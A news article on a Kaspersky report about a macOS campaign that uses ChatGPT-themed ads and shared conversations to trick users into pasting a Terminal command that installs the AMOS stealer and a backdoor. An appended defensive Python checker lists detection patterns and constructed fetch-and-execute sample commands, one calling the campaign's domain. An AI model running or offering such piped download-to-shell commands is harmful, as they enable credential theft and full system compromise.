    Kaspersky warns of ChatGPT-themed macOS malware campaign

    By Arabian Media staff, December 16, 2025

    Kaspersky Threat Research has uncovered a new malware campaign targeting macOS users, exploiting paid Google search ads and shared conversations on the official ChatGPT website to distribute the AMOS (Atomic macOS Stealer) infostealer along with a persistent backdoor.

    According to Kaspersky, attackers are purchasing sponsored search ads linked to queries such as “chatgpt atlas” and redirecting users to what appears to be an installation guide for “ChatGPT Atlas for macOS”. The page is hosted on chatgpt.com and presented as a shared ChatGPT conversation. In reality, the content has been generated through prompt engineering and stripped down to display only step-by-step installation instructions.

    The guide instructs users to copy a single line of code, open the Terminal application on macOS, paste the command, and grant all requested permissions. Kaspersky’s analysis shows that executing the command downloads and runs a malicious script from an external domain, atlas-extension[.]com.

    The script repeatedly prompts users for their system password, validating it by attempting to execute system-level commands. Once the correct password is entered, the malware proceeds to download and install the AMOS infostealer using the stolen credentials, before launching it on the device. The infection method is a variation of the “ClickFix” technique, which relies on persuading users to manually execute shell commands that retrieve malicious code from remote servers.

    Once installed, AMOS harvests sensitive data that can be monetised or reused in subsequent attacks. This includes passwords and cookies from popular web browsers, data from cryptocurrency wallets such as Electrum, Coinomi and Exodus, and information from applications including Telegram Desktop and OpenVPN Connect. The malware also scans for TXT, PDF and DOCX files stored in Desktop, Documents and Downloads folders, as well as notes saved in the macOS Notes app, exfiltrating the data to attacker-controlled infrastructure.

    A backdoor

    In parallel, the campaign deploys a backdoor that is configured to persist across system reboots, providing attackers with remote access to compromised devices and duplicating much of AMOS’s data-collection functionality.

    Kaspersky said the campaign highlights a broader trend in which infostealers have emerged as one of the fastest-growing cyber threats in 2025. Attackers are increasingly leveraging AI-related themes, fake AI tools and AI-generated content to enhance the credibility of their lures. The Atlas-themed activity extends this trend by abusing a legitimate AI platform’s content-sharing features.

    “What makes this case effective is not a sophisticated exploit, but the way social engineering is wrapped in a familiar AI context,” said Vladimir Gursky, malware analyst at Kaspersky. “A sponsored link leads to a well-formatted page on a trusted domain, and the ‘installation guide’ is just a single Terminal command. For many users, that combination of trust and simplicity is enough to bypass their usual caution, yet the result is full compromise of the system and long-term access for the attacker.”

    Kaspersky advised users to exercise caution when encountering unsolicited guides that require running Terminal or PowerShell commands, particularly those involving one-line scripts copied from websites, documents or chat messages. The company also recommended verifying suspicious commands using security tools, avoiding unclear instructions, and ensuring reputable security software is installed and kept up to date on macOS systems.
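
One way to check a copied one-liner before it reaches Terminal, shown as an added example (not Kaspersky's tooling and not part of the original article): a heuristic that flags the fetch-and-execute shapes ClickFix-style guides rely on and any use of the domain named above. The function names, rule set and sample commands are assumptions constructed for illustration; the article does not publish the actual command.

```python
import re

# Domain named in the article (defanged there). Everything else here is constructed.
KNOWN_BAD_HOSTS = {"atlas-extension.com"}

FETCH = r"(?:curl|wget)\b[^|;&]*"                          # downloader and its arguments
SHELL = r"(?:/bin/|/usr/bin/env\s+)?\b(?:ba|z|da)?sh\b"    # sh, bash, zsh, dash
RULES = [
    ("fetch piped into a shell",
     re.compile(FETCH + r"\|\s*(?:sudo\s+)?" + SHELL)),
    ("shell runs fetched text via $(...)",
     re.compile(SHELL + r"\s+-c\s+[\"']?\$\(\s*" + FETCH)),
    ("base64-decoded text piped into a shell",
     re.compile(r"base64\s+(?:-d|-D|--decode)\b[^|;&]*\|\s*(?:sudo\s+)?" + SHELL)),
]
URL_HOST = re.compile(r"https?://([A-Za-z0-9.\-\[\]]+)")


def refang(host: str) -> str:
    """Undo the common [.] defanging so hosts compare equal."""
    return host.replace("[.]", ".").lower().rstrip(".")


def assess_pasted_command(cmd: str) -> list[str]:
    """Return the reasons a pasted one-liner should not be run as-is."""
    findings = [label for label, rx in RULES if rx.search(cmd)]
    for host in map(refang, URL_HOST.findall(cmd)):
        if host in KNOWN_BAD_HOSTS or any(host.endswith("." + h) for h in KNOWN_BAD_HOSTS):
            findings.append(f"contacts host reported in this campaign: {host}")
    return findings


# Constructed sample inputs; example.invalid is a reserved, non-resolving name.
SAMPLES = [
    "curl -fsSL https://downloads.example.invalid/install.sh | bash",
    '/bin/bash -c "$(curl -fsSL https://atlas-extension[.]com/constructed-path)"',
    "echo Y29uc3RydWN0ZWQ= | base64 -D | zsh",
    "brew install wget",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample, "->", assess_pasted_command(sample) or "no findings")
```

An empty result only means none of these patterns matched; it is not evidence that a command is safe.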





